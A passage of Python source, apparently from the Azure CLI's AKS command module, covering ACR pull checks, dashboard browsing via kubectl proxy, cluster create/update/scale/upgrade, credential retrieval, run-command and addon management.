"Could not find kubectl minor version: {}".format(err))
if kubectl_minor_version == -1:
raise ValidationError("Failed to get kubectl version")
podName = "canipull-" + str(uuid.uuid4())
overrides = {
"spec": {
"restartPolicy": "Never",
"hostNetwork": True,
"containers": [
{
"securityContext": {"runAsUser": 0},
"name": podName,
"image": CONST_CANIPULL_IMAGE,
"args": ["-v6", acr],
"stdin": True,
"stdinOnce": True,
"tty": True,
"volumeMounts": [
{"name": "azurejson", "mountPath": "/etc/kubernetes"},
{"name": "sslcerts", "mountPath": "/etc/ssl/certs"},
],
}
],
"tolerations": [
{"key": "CriticalAddonsOnly", "operator": "Exists"},
{"effect": "NoExecute", "operator": "Exists"},
],
"volumes": [
{"name": "azurejson", "hostPath": {"path": "/etc/kubernetes"}},
{"name": "sslcerts", "hostPath": {"path": "/etc/ssl/certs"}},
],
"nodeSelector": {"kubernetes.io/os": "linux"},
}
}
try:
cmd = [
"kubectl",
"run",
"--kubeconfig",
browse_path,
"--rm",
"--quiet",
"--image",
CONST_CANIPULL_IMAGE,
"--overrides",
json.dumps(overrides),
"-it",
podName,
"--namespace=default",
]
# Support kubectl versons < 1.18
if kubectl_minor_version < 18:
cmd += ["--generator=run-pod/v1"]
output = subprocess.check_output(
cmd,
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise AzureInternalError("Failed to check the ACR: {} Command output: {}".format(err, err.output))
if output:
print(output)
# only return the output in test case "test_aks_create_attach_acr"
test_hook_data = get_cmd_test_hook_data("test_aks_create_attach_acr.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("returnOutput", False):
return_msg = output
else:
raise AzureInternalError("Failed to check the ACR.")
finally:
os.close(fd)
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=resource_type,
operation_group='managed_clusters')
# verify the kube-dashboard addon was not disabled
instance = client.get(resource_group_name, name)
addon_profiles = instance.addon_profiles or {}
# addon name is case insensitive
addon_profile = next((addon_profiles[k] for k in addon_profiles
if k.lower() == CONST_KUBE_DASHBOARD_ADDON_NAME.lower()),
ManagedClusterAddonProfile(enabled=False))
return_msg = None
# open portal view if addon is not enabled or k8s version >= 1.19.0
if StrictVersion(instance.kubernetes_version) >= StrictVersion('1.19.0') or (not addon_profile.enabled):
subscription_id = get_subscription_id(cmd.cli_ctx)
dashboardURL = (
# Azure Portal URL (https://portal.azure.com for public cloud)
cmd.cli_ctx.cloud.endpoints.portal +
('/#resource/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.ContainerService'
'/managedClusters/{2}/workloads').format(subscription_id, resource_group_name, name)
)
if in_cloud_console():
logger.warning(
'To view the Kubernetes resources view, please open %s in a new tab', dashboardURL)
else:
logger.warning('Kubernetes resources view on %s', dashboardURL)
return_msg = "Kubernetes resources view on {}".format(dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return return_msg
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise FileOperationError('Can not find kubectl executable in PATH')
fd, browse_path = tempfile.mkstemp()
try:
aks_get_credentials(cmd, client, resource_group_name,
name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--output",
"name",
"--selector",
"k8s-app=kubernetes-dashboard",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard pod: {} Command output: {}'.format(err, err.output))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise ResourceNotFoundError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
[
"kubectl",
"get",
"pods",
"--kubeconfig",
browse_path,
"--namespace",
"kube-system",
"--selector",
"k8s-app=kubernetes-dashboard",
"--output",
"jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'",
],
universal_newlines=True,
stderr=subprocess.STDOUT,
)
# output format: "'{port}'"
dashboard_port = int((dashboard_port.replace("'", "")))
except subprocess.CalledProcessError as err:
raise ResourceNotFoundError('Could not find dashboard port: {} Command output: {}'.format(err, err.output))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post(
'http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post(
"http://localhost:8888/openLink/{0}".format(term_id),
json={"url": dashboardURL},
)
logger.warning(
'To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
timeout = None
test_hook_data = get_cmd_test_hook_data("test_aks_browse_legacy.hook")
if test_hook_data:
test_configs = test_hook_data.get("configs", None)
if test_configs and test_configs.get("enableTimeout", False):
timeout = test_configs.get("timeoutInterval", None)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(
[
"kubectl",
"--kubeconfig",
browse_path,
"proxy",
"--address",
listen_address,
"--port",
listen_port,
],
universal_newlines=True,
stderr=subprocess.STDOUT,
timeout=timeout,
)
except subprocess.CalledProcessError as err:
if err.output.find('unknown flag: --address'):
return_msg = "Test Invalid Address! "
if listen_address != '127.0.0.1':
logger.warning(
'"--address" is only supported in kubectl v1.13 and later.')
logger.warning(
'The "--listen-address" argument will be ignored.')
try:
subprocess.call(["kubectl", "--kubeconfig",
browse_path, "proxy", "--port", listen_port], timeout=timeout)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except subprocess.CalledProcessError as new_err:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
new_err, new_err.output
)
)
else:
raise AzureInternalError(
"Could not open proxy: {} Command output: {}".format(
err, err.output
)
)
except subprocess.TimeoutExpired:
logger.warning("Currently in a test environment, the proxy is closed due to a preset timeout!")
return_msg = return_msg if return_msg else ""
return_msg += "Test Passed!"
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
finally:
os.close(fd)
return return_msg
# pylint: disable=too-many-statements,too-many-branches
def aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=False,
listen_address="127.0.0.1",
listen_port="8001",
):
return _aks_browse(
cmd,
client,
resource_group_name,
name,
disable_browser=disable_browser,
listen_address=listen_address,
listen_port=listen_port,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _validate_ssh_key(no_ssh_key, ssh_key_value):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError(
'Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
# pylint: disable=too-many-statements,too-many-branches
def aks_create(cmd, client, resource_group_name, name, ssh_key_value, # pylint: disable=too-many-locals
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
os_sku=None,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
uptime_sla=False,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
auto_upgrade_channel=None,
enable_addons=None,
workspace_resource_id=None,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
min_count=None,
max_count=None,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
generate_ssh_keys=False, # pylint: disable=unused-argument
api_server_authorized_ip_ranges=None,
enable_private_cluster=False,
private_dns_zone=None,
fqdn_subdomain=None,
disable_public_fqdn=False,
enable_managed_identity=True,
assign_identity=None,
attach_acr=None,
enable_aad=False,
aad_admin_group_object_ids=None,
aci_subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_encryption_at_host=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
assign_kubelet_identity=None,
enable_ultra_ssd=False,
edge_zone=None,
disable_local_accounts=False,
enable_fips_image=False,
no_wait=False,
yes=False,
enable_azure_rbac=False,
aks_custom_headers=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSCreateDecorator
aks_create_decorator = AKSCreateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# construct mc profile
mc = aks_create_decorator.construct_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to create a real managed cluster
return aks_create_decorator.create_mc(mc)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name,
appgw_name=appgw_name,
appgw_subnet_cidr=appgw_subnet_cidr,
appgw_id=appgw_id,
appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation,
rotation_poll_interval=rotation_poll_interval,
no_wait=no_wait)
enable_monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles \
and instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
virtual_node_addon_name = CONST_VIRTUAL_NODE_ADDON_NAME + os_type
enable_virtual_node = (virtual_node_addon_name in instance.addon_profiles and
instance.addon_profiles[virtual_node_addon_name].enabled)
need_pull_for_result = enable_monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_pull_for_result:
if enable_monitoring:
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
aad_route=False,
)
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
if enable_monitoring:
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(
result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_get_versions(cmd, client, location):
return client.list_orchestrators(location, resource_type='managedClusters')
def aks_get_credentials(cmd, client, resource_group_name, name, admin=False,
path=os.path.join(os.path.expanduser(
'~'), '.kube', 'config'),
overwrite_existing=False, context_name=None, public_fqdn=False):
credentialResults = None
serverType = None
if public_fqdn:
serverType = 'public'
if admin:
if serverType is None:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_admin_credentials(
resource_group_name, name, serverType)
else:
if serverType is None:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name)
else:
credentialResults = client.list_cluster_user_credentials(
resource_group_name, name, serverType)
# Check if KUBECONFIG environmental variable is set
# If path is different than default then that means -f/--file is passed
# in which case we ignore the KUBECONFIG variable
# KUBECONFIG can be colon separated. If we find that condition, use the first entry
if "KUBECONFIG" in os.environ and path == os.path.join(os.path.expanduser('~'), '.kube', 'config'):
path = os.environ["KUBECONFIG"].split(":")[0]
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(
encoding='UTF-8')
_print_or_merge_credentials(
path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
def aks_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_nulls(list(managed_clusters))
def aks_show(cmd, client, resource_group_name, name):
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def aks_update_credentials(cmd, client, resource_group_name, name,
reset_service_principal=False,
reset_aad=False,
service_principal=None,
client_secret=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_client_app_id=None,
aad_tenant_id=None,
no_wait=False):
ManagedClusterServicePrincipalProfile = cmd.get_models('ManagedClusterServicePrincipalProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
if bool(reset_service_principal) == bool(reset_aad):
raise CLIError(
'usage error: --reset-service-principal | --reset-aad-profile')
if reset_service_principal:
if service_principal is None or client_secret is None:
raise CLIError(
'usage error: --reset-service-principal --service-principal ID --client-secret SECRET')
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=service_principal, secret=client_secret
)
return sdk_no_wait(no_wait,
client.begin_reset_service_principal_profile,
resource_group_name,
name, service_principal_profile)
if not all([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('usage error: --reset-aad --aad-client-app-id ID --aad-server-app-id ID '
'--aad-server-app-secret SECRET [--aad-tenant-id ID]')
parameters = {
'clientAppID': aad_client_app_id,
'serverAppID': aad_server_app_id,
'serverAppSecret': aad_server_app_secret,
'tenantID': aad_tenant_id
}
return sdk_no_wait(no_wait,
client.begin_reset_aad_profile,
resource_group_name,
name, parameters)
def aks_scale(cmd, client, resource_group_name, name, node_count, nodepool_name="", no_wait=False):
instance = client.get(resource_group_name, name)
if len(instance.agent_pool_profiles) > 1 and nodepool_name == "":
raise CLIError('There are more than one node pool in the cluster. '
'Please specify nodepool name or use az aks nodepool command to scale node pool')
for agent_profile in instance.agent_pool_profiles:
if agent_profile.name == nodepool_name or (nodepool_name == "" and len(instance.agent_pool_profiles) == 1):
if agent_profile.enable_auto_scaling:
raise CLIError(
"Cannot scale cluster autoscaler enabled node pool.")
agent_profile.count = int(node_count) # pylint: disable=no-member
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
raise CLIError('The nodepool "{}" was not found.'.format(nodepool_name))
# pylint: disable=inconsistent-return-statements
def aks_update(cmd, client, resource_group_name, name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None,
uptime_sla=False,
no_uptime_sla=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
attach_acr=None,
detach_acr=None,
api_server_authorized_ip_ranges=None,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
windows_admin_password=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
disable_local_accounts=False,
enable_local_accounts=False,
yes=False,
no_wait=False,
enable_public_fqdn=False,
disable_public_fqdn=False,
enable_azure_rbac=False,
disable_azure_rbac=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
tags=None,
nodepool_labels=None,
aks_custom_headers=None):
# DO NOT MOVE: get all the original parameters and save them as a dictionary
raw_parameters = locals()
# decorator pattern
from .decorator import AKSUpdateDecorator
aks_update_decorator = AKSUpdateDecorator(
cmd=cmd,
client=client,
raw_parameters=raw_parameters,
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
)
try:
# update mc profile
mc = aks_update_decorator.update_default_mc_profile()
except DecoratorEarlyExitException:
# exit gracefully
return None
# send request to update the real managed cluster
return aks_update_decorator.update_mc(mc)
# pylint: disable=unused-argument,inconsistent-return-statements,too-many-return-statements
def aks_upgrade(cmd,
client,
resource_group_name, name,
kubernetes_version='',
control_plane_only=False,
node_image_only=False,
no_wait=False,
yes=False):
msg = 'Kubernetes may be unavailable during cluster upgrades.\n Are you sure you want to perform this operation?'
if not yes and not prompt_y_n(msg, default="n"):
return None
instance = client.get(resource_group_name, name)
vmas_cluster = False
for agent_profile in instance.agent_pool_profiles:
if agent_profile.type.lower() == "availabilityset":
vmas_cluster = True
break
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version. '
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
msg = "This node image upgrade operation will run across every node pool in the cluster" \
"and might take a while, do you wish to continue?"
if not yes and not prompt_y_n(msg, default="n"):
return None
# This only provide convenience for customer at client side so they can run az aks upgrade to upgrade all
# nodepools of a cluster. The SDK only support upgrade single nodepool at a time.
for agent_pool_profile in instance.agent_pool_profiles:
if vmas_cluster:
raise CLIError('This cluster is not using VirtualMachineScaleSets. Node image upgrade only operation '
'can only be applied on VirtualMachineScaleSets cluster.')
agent_pool_client = cf_agent_pools(cmd.cli_ctx)
_upgrade_single_nodepool_image_version(True, agent_pool_client,
resource_group_name, name, agent_pool_profile.name)
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
if instance.kubernetes_version == kubernetes_version:
if instance.provisioning_state == "Succeeded":
logger.warning("The cluster is already on version %s and is not in a failed state. No operations "
"will occur when upgrading to the same version if the cluster is not in a failed state.",
instance.kubernetes_version)
elif instance.provisioning_state == "Failed":
logger.warning("Cluster currently in failed state. Proceeding with upgrade to existing version %s to "
"attempt resolution of failed cluster state.", instance.kubernetes_version)
upgrade_all = False
instance.kubernetes_version = kubernetes_version
# for legacy clusters, we always upgrade node pools with CCP.
if instance.max_agent_pools < 8 or vmas_cluster:
if control_plane_only:
msg = ("Legacy clusters do not support control plane only upgrade. All node pools will be "
"upgraded to {} as well. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
if not control_plane_only:
msg = ("Since control-plane-only argument is not specified, this will upgrade the control plane "
"AND all nodepools to version {}. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
upgrade_all = True
else:
msg = ("Since control-plane-only argument is specified, this will upgrade only the control plane to {}. "
"Node pool will not change. Continue?").format(instance.kubernetes_version)
if not yes and not prompt_y_n(msg, default="n"):
return None
if upgrade_all:
for agent_profile in instance.agent_pool_profiles:
agent_profile.orchestrator_version = kubernetes_version
# null out the SP and AAD profile because otherwise validation complains
instance.service_principal_profile = None
instance.aad_profile = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _upgrade_single_nodepool_image_version(no_wait, client, resource_group_name, cluster_name, nodepool_name):
return sdk_no_wait(
no_wait,
client.begin_upgrade_node_image_version,
resource_group_name,
cluster_name,
nodepool_name,
)
def aks_runcommand(cmd, client, resource_group_name, name, command_string="", command_files=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not command_string:
raise ValidationError('Command cannot be empty.')
RunCommandRequest = cmd.get_models('RunCommandRequest', resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
request_payload = RunCommandRequest(command=command_string)
request_payload.context = _get_command_context(command_files)
# if this cluster have Azure AD enabled, we should pass user token.
# so the command execution also using current user identity.
# here we aquire token for AKS managed server AppID (same id for all cloud)
if mc.aad_profile is not None and mc.aad_profile.managed:
request_payload.cluster_token = _get_dataplane_aad_token(
cmd.cli_ctx, "6dae42f8-4368-4678-94ff-3960e28e3630")
commandResultFuture = client.begin_run_command(
resource_group_name, name, request_payload, polling_interval=5, retry_total=0)
return _print_command_result(cmd.cli_ctx, commandResultFuture.result(300))
def aks_command_result(cmd, client, resource_group_name, name, command_id=""):
if not command_id:
raise ValidationError('CommandID cannot be empty.')
commandResult = client.get_command_result(
resource_group_name, name, command_id)
return _print_command_result(cmd.cli_ctx, commandResult)
def _print_command_result(cli_ctx, commandResult):
# cli_ctx.data['safe_params'] contains list of parameter name user typed in, without value.
# cli core also use this calculate ParameterSetName header for all http request from cli.
if (cli_ctx.data['safe_params'] is None or
"-o" in cli_ctx.data['safe_params'] or
"--output" in cli_ctx.data['safe_params']):
# user specified output format, honor their choice, return object to render pipeline
return commandResult
# user didn't specified any format, we can customize the print for best experience
if commandResult.provisioning_state == "Succeeded":
# succeed, print exitcode, and logs
print(
f"{colorama.Fore.GREEN}command started at {commandResult.started_at}, "
f"finished at {commandResult.finished_at} "
f"with exitcode={commandResult.exit_code}{colorama.Style.RESET_ALL}")
print(commandResult.logs)
return
if commandResult.provisioning_state == "Failed":
# failed, print reason in error
print(
f"{colorama.Fore.RED}command failed with reason: {commandResult.reason}{colorama.Style.RESET_ALL}")
return
# *-ing state
print(f"{colorama.Fore.BLUE}command is in : {commandResult.provisioning_state} state{colorama.Style.RESET_ALL}")
return None
def _get_command_context(command_files):
if not command_files:
return ""
filesToAttach = {}
# . means to attach current folder, cannot combine more files. (at least for now)
if len(command_files) == 1 and command_files[0] == ".":
# current folder
cwd = os.getcwd()
for filefolder, _, files in os.walk(cwd):
for file in files:
# retain folder structure
rel = os.path.relpath(filefolder, cwd)
filesToAttach[os.path.join(
filefolder, file)] = os.path.join(rel, file)
else:
for file in command_files:
if file == ".":
raise ValidationError(
". is used to attach current folder, not expecting other attachements.")
if os.path.isfile(file):
# for individual attached file, flatten them to same folder
filesToAttach[file] = os.path.basename(file)
else:
raise ValidationError(
f"{file} is not valid file, or not accessable.")
if len(filesToAttach) < 1:
logger.debug("no files to attach!")
return ""
zipStream = io.BytesIO()
zipFile = zipfile.ZipFile(zipStream, "w")
for _, (osfile, zipEntry) in enumerate(filesToAttach.items()):
zipFile.write(osfile, zipEntry)
# zipFile.printdir() // use this to debug
zipFile.close()
return str(base64.encodebytes(zipStream.getbuffer()), "utf-8")
def _get_dataplane_aad_token(cli_ctx, serverAppId):
# this function is mostly copied from keyvault cli
return Profile(cli_ctx=cli_ctx).get_raw_token(resource=serverAppId)[0][2].get('accessToken')
DEV_SPACES_EXTENSION_NAME = 'dev-spaces'
DEV_SPACES_EXTENSION_MODULE = 'azext_dev_spaces.custom'
def aks_use_dev_spaces(cmd, client, name, resource_group_name, update=False, space_name=None,
endpoint_type='Public', prompt=False):
"""
Use Azure Dev Spaces with a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param update: Update to the latest Azure Dev Spaces client components.
:type update: bool
:param space_name: Name of the new or existing dev space to select. Defaults to an \
interactive selection experience.
:type space_name: String
:param endpoint_type: The endpoint type to be used for a Azure Dev Spaces controller. \
See https://aka.ms/azds-networking for more information.
:type endpoint_type: String
:param prompt: Do not prompt for confirmation. Requires --space.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE, update):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_use_dev_spaces(
name, resource_group_name, update, space_name, endpoint_type, prompt)
except TypeError:
raise CLIError(
"Use '--update' option to get the latest Azure Dev Spaces client components.")
except AttributeError as ae:
raise CLIError(ae)
def aks_remove_dev_spaces(cmd, client, name, resource_group_name, prompt=False):
"""
Remove Azure Dev Spaces from a managed Kubernetes cluster.
:param name: Name of the managed cluster.
:type name: String
:param resource_group_name: Name of resource group. You can configure the default group. \
Using 'az configure --defaults group=<name>'.
:type resource_group_name: String
:param prompt: Do not prompt for confirmation.
:type prompt: bool
"""
if _get_or_add_extension(cmd, DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE):
azext_custom = _get_azext_module(
DEV_SPACES_EXTENSION_NAME, DEV_SPACES_EXTENSION_MODULE)
try:
azext_custom.ads_remove_dev_spaces(
name, resource_group_name, prompt)
except AttributeError as ae:
raise CLIError(ae)
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True):
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable,
workspace_resource_id=None,
subnet_name=None,
appgw_name=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False):
ManagedClusterAddonProfile = cmd.get_models('ManagedClusterAddonProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='managed_clusters')
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
addon_profile.config = {
CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id}
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
